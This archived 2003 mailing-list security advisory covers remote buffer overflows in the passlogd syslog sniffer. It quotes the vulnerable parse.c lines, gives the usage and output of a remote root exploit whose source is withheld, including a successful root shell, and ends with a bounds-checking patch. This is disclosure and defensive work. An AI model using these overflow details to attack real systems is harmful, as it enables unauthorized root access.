lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030403023842.30935.qmail@hackermail.com>
From: xploit at hackermail.com (dong-h0un U)
Subject: [INetCop Security Advisory] Remote Multiple Buffer Overflow
 vulnerability in passlogd sniffer.


	========================================
	INetCop Security Advisory #2003-0x82-015
	========================================


* Title: Remote Multiple Buffer Overflow vulnerability in passlogd sniffer.


0x01. Description


About:
passlogd(passive syslog capture daemon) is a purpose-built sniffer for capturing
syslog messages in transit. This allows for backup logging to be performed on
a machine with no open ports.

This program is introduced in securityfocus: http://www.securityfocus.com/tools/2076

Vulnerability can presume as following.
There is sl_parse() function to 33 lines of 'passlogd-0.1d/parse.c' code.

    __
    33  void sl_parse(char *user, struct pcap_pkthdr *pkthdr, u_char *pkt)
    34  {
        ...
    42    char level[5];
    43    char message[1024];
    44    char buffer[4096];
        ...
    77    while(pkt[i] != '>'){
    78      level[j] = pkt[i]; // First, buffer overflow happens.
    79      i++;
    80      j++;
    81    }
    82    i++;
        ...
    87    while(pkt[i] != '\n' && pkt[i] != '\r' && i < (pkthdr->caplen - 1)){
    88          if(debug)
    89                  printf("at byte %d of %d\n", i, pkthdr->caplen - 1);
    90      message[z] = pkt[i]; // Second, buffer overflow happens.
    91      i++;
    92      z++;
    93    }
        ...
   103    /* built the logstring */
   104    if(dflag){
   105      sprintf(buffer, "%s %s\n", srcip, message); // Very dangerous.
   106    }
   107    else {
   108      sprintf(buffer, "%s to %s: <%s> %s\n", srcip, dstip, level, message) // Similarly, is dangerous.
;
   109    }
        ... /* Role of original is like this. */
   123      syslev = atoi(level);
   124      openlog("passlogd", 0, LOG_DAEMON);
   125      syslog(syslev, "%s", buffer);
    --

Visual point that change flowing of this program, happen after overwrited stack variables.
Of course, frame pointer overrun exists together.


0x02. Vulnerable Packages


Vendor site: http://www.morphine.com/src/passlogd.html

passlogd v0.1d
-passlogd-0.1d.tar.gz
+FreeBSD
+OpenBSD
+Linux
+Other
passlogd v0.1c
-passlogd-0.1c.tar.gz
passlogd v0.1b
-passlogd-0.1b.tar.gz
passlogd v0.1a
-passlogd-0.1a.tar.gz


0x03. Exploit


Our proof of concept code was completed.
Exhibit it sooner or later.


bash-2.04# ./0x82-Remote.passlogd_sniff.xpl

 passlogd sniffer remote buffer overflow root exploit
                                        by Xpl017Elz.

 Usage: ./0x82-Remote.passlogd_sniff.xpl -option [argument]

        -h - hostname.
        -f - spoof src ip.
        -s - &shellcode.
        -l - buf len.
        -t - target number.
        -i - help information.

 Select target number:

        {0} ALZZA Linux release 6.1 (Linux One)
        {1} WOW Linux release 6.2 (Puberty)
        {2} RedHat Linux release 7.0 (Guinness)
        {3} WOWLiNUX Release 7.1 (Paran)
        {4} RedHat Linux release 8.0 (Psyche)

 Example> ./0x82-Remote.passlogd_sniff.xpl -h localhost -f82.82.82.82 -t3
 Example2> ./0x82-Remote.passlogd_sniff.xpl -h localhost -s0x82828282 -l582

bash-2.04#

test exploit result: --

#1) attacker system:

bash-2.04# ./0x82-Remote.passlogd_sniff.xpl -h61.37.xxx.xx -t2 -s0x82828282

 passlogd sniffer remote buffer overflow root exploit
                                        by Xpl017Elz.

 [0] Set packet code size.
 [1] Set protocol header.
 [2] Make shellcode.
 [3] Set rawsock.
 [4] Send packet.
 [5] Trying 61.37.xxx.xx:36864.
 [-] Connect Failed.

bash-2.04#

#2) target system:

[root@...h /passlogd-0.1d]# gdb -q ./passlogd
(gdb) r
Starting program: /passlogd-0.1d/./passlogd
Wed Mar 26 12:16:27 2003
 
 
                                                                    to
 
 
 
 
 
 
                                                 : <
 
 
 
 
 
 
                                              >
 
                                           r^)  F @   F @ F  N  f  C F  f ^  F )
    F   f F  N  N  N  f   ^ CC f   V  V  fC     ?)    ?A   ?A   V  v    K
   /bin/shd
 
Program received signal SIGSEGV, Segmentation fault.
0x82828282 in ?? ()
(gdb)

real exploit result: --

bash-2.04# ./0x82-Remote.passlogd_sniff.xpl -h61.37.xxx.xx -t2

 passlogd sniffer remote buffer overflow root exploit
                                        by Xpl017Elz.

 [0] Set packet code size.
 [1] Set protocol header.
 [2] Make shellcode.
 [3] Set rawsock.
 [4] Send packet.
 [5] Trying 61.37.xxx.xx:36864.
 [*] Connected to 61.37.xxx.xx:36864.
 [*] Executed shell successfully !

Linux blah 2.4.20 #1 SMP Fri Mar 21 20:36:58 EST 2003 i686 unknown
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@...h /passlogd-0.1d]#

--


0x04. Patch


=== parse.patch ===

--- parse.c	Sat Jun  9 14:07:45 2001
+++ parse.patch.c	Wed Mar 26 11:48:33 2003
@@ -75,6 +75,10 @@
   j=0;
   
   while(pkt[i] != '>'){
+    if(j==sizeof(level)-1)
+    {
+	break;
+    }
     level[j] = pkt[i];
     i++;
     j++;
@@ -87,6 +91,10 @@
   while(pkt[i] != '\n' && pkt[i] != '\r' && i < (pkthdr->caplen - 1)){
 	if(debug)
 		printf("at byte %d of %d\n", i, pkthdr->caplen - 1);
+    if(z==sizeof(message)-1)
+    {
+	break;
+    }
     message[z] = pkt[i];
     i++;
     z++;
@@ -102,10 +110,10 @@
 
   /* built the logstring */
   if(dflag){
-    sprintf(buffer, "%s %s\n", srcip, message);
+    snprintf(buffer, sizeof(buffer)-1, "%s %s\n", srcip, message);
   }
   else {
-    sprintf(buffer, "%s to %s: <%s> %s\n", srcip, dstip, level, message);
+    snprintf(buffer, sizeof(buffer)-1, "%s to %s: <%s> %s\n", srcip, dstip, level, message);
   }
 
   if(debug){

=== eof ===


P.S: Sorry, for my poor english.


--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.

MSN & E-mail: szoahc(at)hotmail(dot)com,
              xploit(at)hackermail(dot)com

INetCop Security Home: http://www.inetcop.org (Korean hacking game)
             My World: http://x82.i21c.net & http://x82.inetcop.org

GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--


-- 
_______________________________________________
Get your free email from http://www.hackermail.com

Powered by Outblaze

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ